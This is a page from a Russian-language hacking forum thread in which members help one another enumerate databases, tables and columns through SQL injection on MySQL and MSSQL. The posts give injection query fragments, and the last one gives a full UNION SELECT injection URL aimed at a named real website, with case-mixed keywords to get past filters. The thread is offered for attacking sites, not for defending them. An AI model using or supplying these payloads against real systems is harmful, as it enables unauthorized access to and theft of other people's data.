HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1405 из 2438 « Первая < 405905130513551395 1401 1402 1403 1404 1405 1406 1407 1408 1409 14151455150519052405 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14041  
Старый 25.06.2010, 19:36
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию
Цитата:
Сообщение от ZARO  
ZARO said:
Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?
Код:
Code:
select schema_name from information_schema.schemata
если так понял
 
Ответить с цитированием

  #14042  
Старый 25.06.2010, 19:47
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию
Или так:

Код:
Code:
select table_schema from information_schema.tables
 
Ответить с цитированием

  #14043  
Старый 25.06.2010, 19:47
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
Отправить сообщение для ZARO с помощью ICQ
По умолчанию
Цитата:
Сообщение от .:[melkiy  
:."]
.:[melkiy]:. said:
Код:
Code:
select schema_name from information_schema.schemata
если так понял
Спсибо! То что нужно)
 
Ответить с цитированием

  #14044  
Старый 25.06.2010, 19:52
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от DrAssault  
DrAssault said:
Или так:
Код:
Code:
select table_schema from information_schema.tables
И что, в бд примерно 40 табл, group_concat() ограничен 512 символами.

40 табл находится в базе bla1.

Просто тупо, bla1 40 раз повторится. Не вариант.

// 2Konqi, даже так.

// manual говорит что 512.
 
Ответить с цитированием

  #14045  
Старый 25.06.2010, 19:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от Ctacok  
Ctacok said:
И что, в бд примерно 40 табл, group_concat() ограничен 512 символами.
40 табл находится в базе bla1.
Просто тупо, bla1 40 раз повторится.
Не вариант
.
первый 16 будут information_schema
 
Ответить с цитированием

  #14046  
Старый 25.06.2010, 20:07
auth_root
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455

Репутация: 18
По умолчанию
А если так

select concat_ws(0x3A3a,table_schema,table_name,column_na me) from information_schema.columns limit 1,1

и лимитом перебирать? Будет выводить к какой базе относится таблица и поле, так и узнаем все базы на серваке. Или я не правильно понял вопрос
 
Ответить с цитированием

  #14047  
Старый 25.06.2010, 20:13
Iggy
Guest
Сообщений: n/a
Провел на форуме:
26362

Репутация: 1
По умолчанию
Цитата:
Сообщение от ZARO  
ZARO said:
Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?
(MSSQL)

Код:
Code:
use master
select * from sysdatabases
или

Код:
Code:
select name from master..sysdatabases
(MySQL)

Код:
Code:
SELECT CATALOG_NAME AS DataBaseName
FROM INFORMATION_SCHEMA.SCHEMATA
или

Код:
Code:
SELECT name AS DATABASENAME
FROM master.dbo.sysdatabases
 
Ответить с цитированием

  #14048  
Старый 25.06.2010, 20:37
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию
Цитата:
Сообщение от Konqi  
Konqi said:
первый 16 будут information_schema
Хорошая статья про group_concat, почитай.

Код:
Code:
/thread118842.html
 
Ответить с цитированием

  #14049  
Старый 25.06.2010, 21:02
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от FlaktW  
FlaktW said:
Хорошая статья про group_concat, почитай.
Код:
Code:
/thread118842.html

прости если я что то не так написал, просто я NooB в этих делах, что я не правильно сказал ?
 
Ответить с цитированием

  #14050  
Старый 25.06.2010, 22:49
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию
can'not get tables....

Код:
Code:
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,unhex%28hex%28group_concat%28table_name%29%29%29,4,5,6,7,8,9+from+information_schema.tables--
 
Ответить с цитированием
Ответ
Страница 1405 из 2438 « Первая < 405905130513551395 1401 1402 1403 1404 1405 1406 1407 1408 1409 14151455150519052405 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ